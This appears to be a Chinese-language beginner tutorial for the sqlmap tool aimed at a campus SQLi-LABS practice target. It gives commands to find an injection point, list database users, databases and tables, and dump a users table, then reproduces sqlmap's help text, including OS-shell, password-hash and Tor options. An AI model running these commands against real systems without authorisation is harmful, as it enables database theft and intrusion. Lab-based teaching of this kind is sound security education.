1、工具下载
2、学习环境
本机:Python3
靶机:校内SQLi-LABS、其他自建靶机、其他渗透测试环境
3、使用教程
1、入门教程
1、软件运行
在Sqlmap文件夹右键点击空白处,点击在终端中打开,或者在地址栏中输入cmd。
在终端中输入以下代码,并回车,若能正确返回Python版本,则Python环境正常,若无法返回版本,但已经安装Python,请确认环境变量是否正确,安装Python时请勾选添加到path中。
python --version
2、寻找注入点
输入以下命令进行注入点检测。
python sqlmap.py http://10.61.32.103:81/Less-1/?id=1
若返回大致上图内容,则表明找到了注入点。后续操作可以直接从存档中调取Payload,无需等待寻找注入点。
3、漏洞利用
获取数据库登录用户名
sqlmap.py http://10.61.32.103:81/Less-1/?id=1 --users获取数据库存在的库名
python sqlmap.py http://10.61.32.103:81/Less-1/?id=1 --dbs获取数据库存在的表名
python sqlmap.py http://10.61.32.103:81/Less-1/?id=1 --tables将数据库全部表内容下载到本地csv文件
python sqlmap.py http://10.61.32.103:81/Less-1/?id=1 --dump指定数据库名、表名下载数据到本地csv文件
python sqlmap.py http://10.61.32.103:81/Less-1/?id=1 -D security -T users --dump
4、帮助文档
输入以下命令获取官方帮助文档
python sqlmap.py --help现贴出如下:
Usage: sqlmap.py [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
These options do not fit into any other category
--wizard Simple wizard interface for beginner users